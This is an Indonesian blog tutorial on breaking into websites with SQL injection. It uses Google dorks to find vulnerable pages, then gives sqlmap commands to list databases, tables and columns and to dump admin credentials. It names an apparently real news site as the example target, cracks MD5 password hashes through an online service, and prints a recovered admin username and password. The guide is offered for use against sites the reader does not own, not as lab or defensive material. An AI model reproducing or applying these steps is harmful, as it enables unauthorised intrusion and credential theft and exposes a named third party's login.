Tutorial mencari username dan password admin web dengan sqlmap di windows.

Selamat pagi semuanya , kali ini ane mau bikin tutorial mencari username + password dengan sqlmap di windows.
Sqlmap ini adalah tool khusus untuk mengexploit kerentanan yang bertype sqli injection. sqli injection sendiri adalah teknik penyerangan database dengan perintah perintah tertentu sehingga si penyerang dapat mengetahui isi database sebuah web yang di dalamnya terdapat username dan password admin web.

Alat yang di butuhkan :
1. sqlmap
2. pc sudah terinstall python disini
2. web vuln sqli injection
3. komputer :V
4. segelas semangat untuk memulai semuanya :)

lets mulai :v
1. sqlmap silahkan download di sini download yang zip.

Tools ini berbasis bahasa python jadi untuk menjalankanya silahkan install python terlebih dahulu , untuk tutorialnya disini.
setelah di download silahkan extract . lalu copy kan file nya ke folder c:\python27 (folder python di sesuaikan dengan versi python masing2).

2. web vuln sqli injection
Untuk web vuln silahkan teman teman cari dengan dork :
inurl:berita.php?id=
inurl:index.php?id=
inurl:details.php?id=
inurl:news.php?id=
(untuk dork bisa teman teman cari di google/buat sendiri karena dork sqli ini sangat bervariasi).
ambil salah satu dork  lalu coba buka satu satu dan tambahkan tanda kutip satu(') di belakang url.
dan jika terjadi errorr seperti " “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " atau errorr yang lain berarti web itu vuln sqli. 

sebagai pembelajaran di sini saya akan memakai web http://www.pakuanraya.com/m/berita.php?id=136

setelah dapat web yang vuln sekarang mari beraksi :v

3. Masuk cmd  kemudian masuk ke direktori sqlmap yang tadi, dengan perintah "cd /python27/sqlmap/" perintah untuk foldernya di sesuaikan dengan nama folder di pc teman teman .

4. Masukan perintah "python sqlmap.py -u target.com --dbs" lalu enter. jika nanti muncul pilihan - pilihan silahkan agan2 pilih yes/tekan enter saja . tunggu sampai muncul nama database nya.

Tuhkan nama nama database nya udah muncul. :)
ket : -u = url target , --dbs = menampilkan databasenya . 

5. Masukan lagi perintah "python sqlmap.py -u target.com -D namadatabase --tables" untuk memunculkan nama nama table dari database yang di pilih . oh iya, yang kita ambil bukan information schema karena db itu ada di setiap web . dan ane belum tau fungsinya :'v . lalu tunggu sampai muncul nama-nama tablenya.

tuh tablenya keliatan :v .
ket : -D = nama database, --tables = tampilkan table dari db

6. Karena kita mau nyari username+password adminya, maka kita pilih table admin_web (untuk nama table admin bisa user,admin,member tergantung yang bikin web). masukan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web --columns" untuk menampilkan kolom kolom yang terapat dalam tabel admin_web.

muncul lagi tuh kolomnya :v.
-T = nama table , --columns = tampilkan kolom dari table yang di pilih.

6. Setelah muncul kolomnya, saatnya kita mengambil username dan passwordnya dengan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web -C password,username --dump" untuk password dan username sesuaikan dengan nama kolom target agan.

  jika perintah tadi sudah di masukan , maka akan muncul kiran kira gambar sebagai berikut

kalo di bahasa indonesian gini " bro usernamnya udah ada , tapi passwordnya di encrypt/hash md5 mau di decrypt sama worldlist yang ada di sqlmap nggk ?" kira2 gitu lah :v
kita yes/enter aja siapa tahu ada yang nyangkut . :) .

ada beberapa password yang berhasil di hash, sayangnya levelnya bukan admin . :v
karena password adminya belum ke hash mari kita coba gunain website decryt md5 online. disini

tuhkan passwordnya ketemu buat username mulyono :) .
username:mulyono
password: M03--I33

tinnggal nyari login adminya deh :)

sekian tutorial kali ini , tetap panteng blog ini untuk update kedepanya . salam dari nubi.